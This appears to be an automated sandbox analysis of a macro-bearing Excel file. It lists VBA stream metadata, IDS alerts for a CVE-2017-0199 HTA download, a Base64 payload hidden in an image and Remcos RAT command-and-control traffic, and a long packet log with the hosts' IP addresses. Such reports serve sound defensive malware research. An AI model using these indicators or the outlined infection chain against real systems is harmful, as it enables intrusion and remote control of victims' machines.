                                                                                                                                                                              Entropy:7.997732172342711
                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . L y 5 . [ . . ` : 1 l ` ( . R y . . q . . 8 " < ! . . . . . . . 7 . . . \\ . p . . . Q i t w A { . P W . p J 1 ? @ X h / . . . h L . f . . [ . g . 2 . N | g . . . . . T . . ] / C $ A } % c N z # & Y Y { q . B . . . [ a . . . & . . . = . . . . $ W . . . 1 V 1 } M m " 6 . . . U . . . . . . . . . . . . . . . . C . . . = . . . 5 . . $ _ } s @ . . . . e . . . . . " . . . . . . . . . 5 . . . . . . . w 1 . . . . . - p . 0 n J . Z d N . O 1 . . . B . . > . } }
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                              Stream Size:527
                                                                                                                                                                              Entropy:5.223213255583526
                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                              Data ASCII:I D = " { 5 4 1 B C 8 E 7 - 0 C B 5 - 4 E 8 1 - B 0 F 4 - 9 A 4 2 5 C 1 D F 6 C 6 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 9 5 9 7 6 C B 2 A C D 0 B 0 D 0 B
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Stream Size:104
                                                                                                                                                                              Entropy:3.0488640812019017
                                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                                              Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Stream Size:2644
                                                                                                                                                                              Entropy:4.001922512755346
                                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                                              Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Stream Size:553
                                                                                                                                                                              Entropy:6.368143979425921
                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                              Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-14T11:05:44.110782+0200 | 2024449 | ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl | 1 | 192.168.2.22 | 49162 | 192.3.220.40 | 80 | TCP
2024-10-14T11:05:44.110820+0200 | 2024197 | ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) | 1 | 192.3.220.40 | 80 | 192.168.2.22 | 49162 | TCP
2024-10-14T11:05:46.327952+0200 | 2024449 | ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl | 1 | 192.168.2.22 | 49164 | 192.3.220.40 | 80 | TCP
2024-10-14T11:05:46.327953+0200 | 2024197 | ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) | 1 | 192.3.220.40 | 80 | 192.168.2.22 | 49164 | TCP
2024-10-14T11:06:06.412128+0200 | 2024449 | ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl | 1 | 192.168.2.22 | 49171 | 192.3.220.40 | 80 | TCP
2024-10-14T11:06:08.509149+0200 | 2049038 | ET MALWARE Malicious Base64 Encoded Payload In Image | 1 | 185.199.108.133 | 443 | 192.168.2.22 | 49167 | TCP
2024-10-14T11:06:09.576932+0200 | 2020423 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 | 1 | 192.3.220.40 | 80 | 192.168.2.22 | 49172 | TCP
2024-10-14T11:06:09.576932+0200 | 2020425 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 | 1 | 192.3.220.40 | 80 | 192.168.2.22 | 49172 | TCP
2024-10-14T11:06:13.282795+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49173 | 135.148.195.248 | 6875 | TCP
2024-10-14T11:06:14.272151+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49174 | 135.148.195.248 | 6875 | TCP
2024-10-14T11:06:14.702051+0200 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.22 | 49175 | 178.237.33.50 | 80 | TCP
2024-10-14T11:06:24.551621+0200 | 2049038 | ET MALWARE Malicious Base64 Encoded Payload In Image | 1 | 185.199.108.133 | 443 | 192.168.2.22 | 49176 | TCP
2024-10-14T11:06:25.520311+0200 | 2020423 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 | 1 | 192.3.220.40 | 80 | 192.168.2.22 | 49177 | TCP
2024-10-14T11:06:25.520311+0200 | 2020425 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 | 1 | 192.3.220.40 | 80 | 192.168.2.22 | 49177 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                              Oct 14, 2024 11:05:44.205602884 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.205609083 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.205636024 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.205643892 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.205670118 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.205678940 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.205704927 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.205713987 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.205743074 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.205754995 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.205785036 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.205909014 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.205943108 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.205951929 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.205977917 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.205988884 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.206012964 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.206018925 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.206053972 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.210711956 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.210767984 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.210783005 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.210808039 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.297951937 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.298018932 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.298053980 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.298085928 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.298086882 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.298119068 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.298120975 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.298125982 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.298166990 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.298172951 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.298223019 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.298229933 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.298259020 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.298274040 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.298301935 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.298309088 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.298341990 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.298353910 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.298374891 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.298388958 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.298410892 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.298424959 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.298444986 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.298465014 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.298477888 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.298496008 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.298510075 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.298511982 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.298547029 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.298563957 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.298604012 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.299137115 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.299190998 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.299190998 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.299228907 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.299237013 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.299277067 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.299324036 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.299357891 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.299374104 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.299401999 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.299416065 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.299444914 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.299472094 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.299490929 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.299793005 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.299825907 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.299841881 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.299863100 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.299877882 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.299913883 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.299916029 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.299952984 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.299961090 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.299985886 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.299998045 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.300019979 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.300024033 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.300039053 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.300081015 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.300659895 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.300710917 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.300714970 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.300760984 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.300761938 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.300800085 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.300812006 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.300828934 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.300849915 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.300879002 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.515680075 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.515794992 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.768805981 CEST49163443192.168.2.22150.136.81.248
                                                                                                                                                                              Oct 14, 2024 11:05:44.768842936 CEST44349163150.136.81.248192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.768898964 CEST49163443192.168.2.22150.136.81.248
                                                                                                                                                                              Oct 14, 2024 11:05:44.774234056 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.774286032 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.784219027 CEST49163443192.168.2.22150.136.81.248
                                                                                                                                                                              Oct 14, 2024 11:05:44.784245014 CEST44349163150.136.81.248192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:45.262101889 CEST44349163150.136.81.248192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:45.262222052 CEST49163443192.168.2.22150.136.81.248
                                                                                                                                                                              Oct 14, 2024 11:05:45.323368073 CEST49163443192.168.2.22150.136.81.248
                                                                                                                                                                              Oct 14, 2024 11:05:45.323395967 CEST44349163150.136.81.248192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:45.323769093 CEST44349163150.136.81.248192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:45.323854923 CEST49163443192.168.2.22150.136.81.248
                                                                                                                                                                              Oct 14, 2024 11:05:45.615870953 CEST49163443192.168.2.22150.136.81.248
                                                                                                                                                                              Oct 14, 2024 11:05:45.659411907 CEST44349163150.136.81.248192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:45.721039057 CEST44349163150.136.81.248192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:45.721090078 CEST49163443192.168.2.22150.136.81.248
                                                                                                                                                                              Oct 14, 2024 11:05:45.721103907 CEST44349163150.136.81.248192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:45.721144915 CEST49163443192.168.2.22150.136.81.248
                                                                                                                                                                              Oct 14, 2024 11:05:46.515691996 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.515702963 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.515712976 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.515717983 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.515733957 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.515736103 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.515748024 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.515760899 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.515770912 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.515775919 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.515830994 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.515866041 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.516484022 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.516526937 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.516529083 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.516541004 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.516560078 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.516571999 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.516572952 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.516583920 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.516598940 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.516611099 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.518610001 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.518663883 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.605921030 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.605959892 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.606137991 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.606142044 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.606174946 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.606189013 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.606215000 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.606252909 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.606414080 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.606446028 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.606458902 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.606482983 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.606496096 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.606529951 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.606544971 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.606579065 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.606610060 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.606616020 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.606643915 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.606657982 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.606688976 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.606693029 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.606722116 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.606753111 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.606756926 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.606807947 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.606811047 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.606842995 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.606853008 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.606877089 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.606906891 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.606952906 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.606955051 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.606990099 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.606996059 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.607023001 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.607027054 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.607054949 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.607054949 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.607085943 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.607099056 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.607121944 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.607136011 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.607167006 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.607178926 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.607201099 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.607223988 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.607234955 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.607245922 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.607268095 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.607275009 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.607300043 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.607309103 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.607331991 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.607346058 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.607372046 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.607378960 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.607424974 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.607456923 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.607487917 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.607490063 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.607520103 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.607532978 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.607552052 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.607556105 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.607589960 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.607590914 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.607621908 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.607630968 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.607655048 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.607661963 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.607686996 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.607696056 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.607718945 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.607727051 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.607750893 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.607772112 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:46.607784033 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:46.607791901 CEST4916480192.168.2.22192.3.220.40
